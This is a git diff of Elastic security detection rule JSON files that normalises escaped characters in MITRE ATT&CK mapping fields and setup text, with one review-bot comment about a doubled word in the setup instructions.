diff --git a/packages/security_detection_engine/kibana/security_rule/90169566-2260-4824-b8e4-8615c3b4ed52_104.json b/packages/security_detection_engine/kibana/security_rule/90169566-2260-4824-b8e4-8615c3b4ed52_104.json
index e7b17da7f9f..13e2bf18be8 100644
--- a/packages/security_detection_engine/kibana/security_rule/90169566-2260-4824-b8e4-8615c3b4ed52_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/90169566-2260-4824-b8e4-8615c3b4ed52_104.json
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/90169566-2260-4824-b8e4-8615c3b4ed52_105.json b/packages/security_detection_engine/kibana/security_rule/90169566-2260-4824-b8e4-8615c3b4ed52_105.json
index 5196562b968..e235017e2bd 100644
--- a/packages/security_detection_engine/kibana/security_rule/90169566-2260-4824-b8e4-8615c3b4ed52_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/90169566-2260-4824-b8e4-8615c3b4ed52_105.json
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/90169566-2260-4824-b8e4-8615c3b4ed52_106.json b/packages/security_detection_engine/kibana/security_rule/90169566-2260-4824-b8e4-8615c3b4ed52_106.json
index 7c980aa7b1c..20340513736 100644
--- a/packages/security_detection_engine/kibana/security_rule/90169566-2260-4824-b8e4-8615c3b4ed52_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/90169566-2260-4824-b8e4-8615c3b4ed52_106.json
@@ -57,7 +57,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/90169566-2260-4824-b8e4-8615c3b4ed52_107.json b/packages/security_detection_engine/kibana/security_rule/90169566-2260-4824-b8e4-8615c3b4ed52_107.json
index 92b95b2cd2d..55f856cbd86 100644
--- a/packages/security_detection_engine/kibana/security_rule/90169566-2260-4824-b8e4-8615c3b4ed52_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/90169566-2260-4824-b8e4-8615c3b4ed52_107.json
@@ -57,7 +57,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/9055ece6-2689-4224-a0e0-b04881e1f8ad_102.json b/packages/security_detection_engine/kibana/security_rule/9055ece6-2689-4224-a0e0-b04881e1f8ad_102.json
index 2df5df89acf..e7e1f4be826 100644
--- a/packages/security_detection_engine/kibana/security_rule/9055ece6-2689-4224-a0e0-b04881e1f8ad_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/9055ece6-2689-4224-a0e0-b04881e1f8ad_102.json
@@ -70,7 +70,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/9055ece6-2689-4224-a0e0-b04881e1f8ad_103.json b/packages/security_detection_engine/kibana/security_rule/9055ece6-2689-4224-a0e0-b04881e1f8ad_103.json
index 78b9ba6f150..86aa1f98019 100644
--- a/packages/security_detection_engine/kibana/security_rule/9055ece6-2689-4224-a0e0-b04881e1f8ad_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/9055ece6-2689-4224-a0e0-b04881e1f8ad_103.json
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/9055ece6-2689-4224-a0e0-b04881e1f8ad_104.json b/packages/security_detection_engine/kibana/security_rule/9055ece6-2689-4224-a0e0-b04881e1f8ad_104.json
index a141ece0490..272b3ab4ed0 100644
--- a/packages/security_detection_engine/kibana/security_rule/9055ece6-2689-4224-a0e0-b04881e1f8ad_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/9055ece6-2689-4224-a0e0-b04881e1f8ad_104.json
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/9055ece6-2689-4224-a0e0-b04881e1f8ad_205.json b/packages/security_detection_engine/kibana/security_rule/9055ece6-2689-4224-a0e0-b04881e1f8ad_205.json
index 3a4effe15c8..d92c756366f 100644
--- a/packages/security_detection_engine/kibana/security_rule/9055ece6-2689-4224-a0e0-b04881e1f8ad_205.json
+++ b/packages/security_detection_engine/kibana/security_rule/9055ece6-2689-4224-a0e0-b04881e1f8ad_205.json
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/9092cd6c-650f-4fa3-8a8a-28256c7489c9_102.json b/packages/security_detection_engine/kibana/security_rule/9092cd6c-650f-4fa3-8a8a-28256c7489c9_102.json
index dbad5d9f680..1e96570972f 100644
--- a/packages/security_detection_engine/kibana/security_rule/9092cd6c-650f-4fa3-8a8a-28256c7489c9_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/9092cd6c-650f-4fa3-8a8a-28256c7489c9_102.json
@@ -58,7 +58,7 @@
 ],
 "risk_score": 73,
 "rule_id": "9092cd6c-650f-4fa3-8a8a-28256c7489c9",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/9092cd6c-650f-4fa3-8a8a-28256c7489c9_103.json b/packages/security_detection_engine/kibana/security_rule/9092cd6c-650f-4fa3-8a8a-28256c7489c9_103.json
index 15775a0461c..65f3756520b 100644
--- a/packages/security_detection_engine/kibana/security_rule/9092cd6c-650f-4fa3-8a8a-28256c7489c9_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/9092cd6c-650f-4fa3-8a8a-28256c7489c9_103.json
@@ -58,7 +58,7 @@
 ],
 "risk_score": 73,
 "rule_id": "9092cd6c-650f-4fa3-8a8a-28256c7489c9",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/9092cd6c-650f-4fa3-8a8a-28256c7489c9_104.json b/packages/security_detection_engine/kibana/security_rule/9092cd6c-650f-4fa3-8a8a-28256c7489c9_104.json
index 1dceb80438f..c473e51bf4b 100644
--- a/packages/security_detection_engine/kibana/security_rule/9092cd6c-650f-4fa3-8a8a-28256c7489c9_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/9092cd6c-650f-4fa3-8a8a-28256c7489c9_104.json
@@ -58,7 +58,7 @@
 ],
 "risk_score": 73,
 "rule_id": "9092cd6c-650f-4fa3-8a8a-28256c7489c9",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/9092cd6c-650f-4fa3-8a8a-28256c7489c9_105.json b/packages/security_detection_engine/kibana/security_rule/9092cd6c-650f-4fa3-8a8a-28256c7489c9_105.json
index 0f94816a3d2..24504db80cb 100644
--- a/packages/security_detection_engine/kibana/security_rule/9092cd6c-650f-4fa3-8a8a-28256c7489c9_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/9092cd6c-650f-4fa3-8a8a-28256c7489c9_105.json
@@ -57,7 +57,7 @@
 ],
 "risk_score": 73,
 "rule_id": "9092cd6c-650f-4fa3-8a8a-28256c7489c9",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/9092cd6c-650f-4fa3-8a8a-28256c7489c9_106.json b/packages/security_detection_engine/kibana/security_rule/9092cd6c-650f-4fa3-8a8a-28256c7489c9_106.json
index af760a40b95..095899c0633 100644
--- a/packages/security_detection_engine/kibana/security_rule/9092cd6c-650f-4fa3-8a8a-28256c7489c9_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/9092cd6c-650f-4fa3-8a8a-28256c7489c9_106.json
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/90babaa8-5216-4568-992d-d4a01a105d98_1.json b/packages/security_detection_engine/kibana/security_rule/90babaa8-5216-4568-992d-d4a01a105d98_1.json
index 4896ccdaa92..f9939762da3 100644
--- a/packages/security_detection_engine/kibana/security_rule/90babaa8-5216-4568-992d-d4a01a105d98_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/90babaa8-5216-4568-992d-d4a01a105d98_1.json
@@ -55,7 +55,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/9180ffdf-f3d0-4db3-bf66-7a14bcff71b8_103.json b/packages/security_detection_engine/kibana/security_rule/9180ffdf-f3d0-4db3-bf66-7a14bcff71b8_103.json
index 4ade8bc1320..2a5d28194e3 100644
--- a/packages/security_detection_engine/kibana/security_rule/9180ffdf-f3d0-4db3-bf66-7a14bcff71b8_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/9180ffdf-f3d0-4db3-bf66-7a14bcff71b8_103.json
@@ -55,7 +55,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/9180ffdf-f3d0-4db3-bf66-7a14bcff71b8_104.json b/packages/security_detection_engine/kibana/security_rule/9180ffdf-f3d0-4db3-bf66-7a14bcff71b8_104.json
index 65448f51656..51014a3286d 100644
--- a/packages/security_detection_engine/kibana/security_rule/9180ffdf-f3d0-4db3-bf66-7a14bcff71b8_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/9180ffdf-f3d0-4db3-bf66-7a14bcff71b8_104.json
@@ -52,7 +52,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/91d04cd4-47a9-4334-ab14-084abe274d49_102.json b/packages/security_detection_engine/kibana/security_rule/91d04cd4-47a9-4334-ab14-084abe274d49_102.json
index bb46a6c666f..a032f070fad 100644
--- a/packages/security_detection_engine/kibana/security_rule/91d04cd4-47a9-4334-ab14-084abe274d49_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/91d04cd4-47a9-4334-ab14-084abe274d49_102.json
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/91d04cd4-47a9-4334-ab14-084abe274d49_103.json b/packages/security_detection_engine/kibana/security_rule/91d04cd4-47a9-4334-ab14-084abe274d49_103.json
index aad9da176b0..059f6c2cc21 100644
--- a/packages/security_detection_engine/kibana/security_rule/91d04cd4-47a9-4334-ab14-084abe274d49_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/91d04cd4-47a9-4334-ab14-084abe274d49_103.json
@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/91d04cd4-47a9-4334-ab14-084abe274d49_104.json b/packages/security_detection_engine/kibana/security_rule/91d04cd4-47a9-4334-ab14-084abe274d49_104.json
index a8de9acedb1..0483bea8966 100644
--- a/packages/security_detection_engine/kibana/security_rule/91d04cd4-47a9-4334-ab14-084abe274d49_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/91d04cd4-47a9-4334-ab14-084abe274d49_104.json
@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/91d04cd4-47a9-4334-ab14-084abe274d49_205.json b/packages/security_detection_engine/kibana/security_rule/91d04cd4-47a9-4334-ab14-084abe274d49_205.json
index f868d9f87c3..073b8a4dc7e 100644
--- a/packages/security_detection_engine/kibana/security_rule/91d04cd4-47a9-4334-ab14-084abe274d49_205.json
+++ b/packages/security_detection_engine/kibana/security_rule/91d04cd4-47a9-4334-ab14-084abe274d49_205.json
@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8d77-07827ac4cee0_101.json b/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8d77-07827ac4cee0_101.json
index c9ee08c3941..5d71a2dacef 100644
--- a/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8d77-07827ac4cee0_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8d77-07827ac4cee0_101.json
@@ -29,7 +29,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8d77-07827ac4cee0_102.json b/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8d77-07827ac4cee0_102.json
index 356b91bb67b..834a5566db6 100644
--- a/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8d77-07827ac4cee0_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8d77-07827ac4cee0_102.json
@@ -27,7 +27,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8d77-07827ac4cee0_103.json b/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8d77-07827ac4cee0_103.json
index 5a58a9ae4c8..7eea440cad5 100644
--- a/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8d77-07827ac4cee0_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8d77-07827ac4cee0_103.json
@@ -37,7 +37,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8f55-07827ac3acc9_101.json b/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8f55-07827ac3acc9_101.json
index ffaa85cd294..84b542d2312 100644
--- a/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8f55-07827ac3acc9_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8f55-07827ac3acc9_101.json
@@ -29,7 +29,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8f55-07827ac3acc9_102.json b/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8f55-07827ac3acc9_102.json
index ed61d8464fa..39648dc1773 100644
--- a/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8f55-07827ac3acc9_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8f55-07827ac3acc9_102.json
@@ -27,7 +27,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8f55-07827ac3acc9_103.json b/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8f55-07827ac3acc9_103.json
index f755f38176f..e2f6046b413 100644
--- a/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8f55-07827ac3acc9_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8f55-07827ac3acc9_103.json
@@ -37,7 +37,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8f66-07827ac3bdd9_101.json b/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8f66-07827ac3bdd9_101.json
index 57fdc8f88fe..e9abaceebec 100644
--- a/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8f66-07827ac3bdd9_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8f66-07827ac3bdd9_101.json
@@ -29,7 +29,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8f66-07827ac3bdd9_102.json b/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8f66-07827ac3bdd9_102.json
index 452568773a1..c061e9a04dc 100644
--- a/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8f66-07827ac3bdd9_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8f66-07827ac3bdd9_102.json
@@ -27,7 +27,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8f66-07827ac3bdd9_103.json b/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8f66-07827ac3bdd9_103.json
index 2636ad1a3ef..1b6fa46db79 100644
--- a/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8f66-07827ac3bdd9_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8f66-07827ac3bdd9_103.json
@@ -37,7 +37,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_2.json b/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_2.json
index b70527b44fb..e074eabc5a3 100644
--- a/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_2.json
@@ -48,7 +48,7 @@
 ],
 "risk_score": 47,
 "rule_id": "92984446-aefb-4d5e-ad12-598042ca80ba",
- "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
+ "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection",
@@ -76,7 +76,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_3.json b/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_3.json
index 9fcaa18a8be..59df8df6487 100644
--- a/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_3.json
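Review bot: The new-side `setup` string of rule 92984446-aefb-4d5e-ad12-598042ca80ba still carries the doubled word in `Steps to implement the logging policy with with Advanced Audit Configuration:`, and this hunk only swaps `\u003e` for `>` around it; it should read `Steps to implement the logging policy with Advanced Audit Configuration:`. If these JSON files are exported from upstream rule sources, the wording fix belongs there so it is not reverted on the next regeneration. The same text recurs in the `_3`, `_4`, `_5`, `_6` and `_7` versions of this rule in the following hunks. The escape normalization itself (`\u003e` → `>`, `\u0026` → `&`) leaves the parsed JSON values unchanged, so the rule logic and its MITRE mapping are unaffected by this commit.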
@@ -48,7 +48,7 @@
 ],
 "risk_score": 47,
 "rule_id": "92984446-aefb-4d5e-ad12-598042ca80ba",
- "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
+ "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection",
@@ -75,7 +75,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_4.json b/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_4.json
index 846c2ba0a03..c205de5ce80 100644
--- a/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_4.json
@@ -48,7 +48,7 @@
 ],
 "risk_score": 47,
 "rule_id": "92984446-aefb-4d5e-ad12-598042ca80ba",
- "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
+ "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection",
@@ -75,7 +75,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_5.json b/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_5.json
index 293bbab9c4a..05336f81791 100644
--- a/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_5.json
+++ b/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_5.json
@@ -58,7 +58,7 @@
 ],
 "risk_score": 47,
 "rule_id": "92984446-aefb-4d5e-ad12-598042ca80ba",
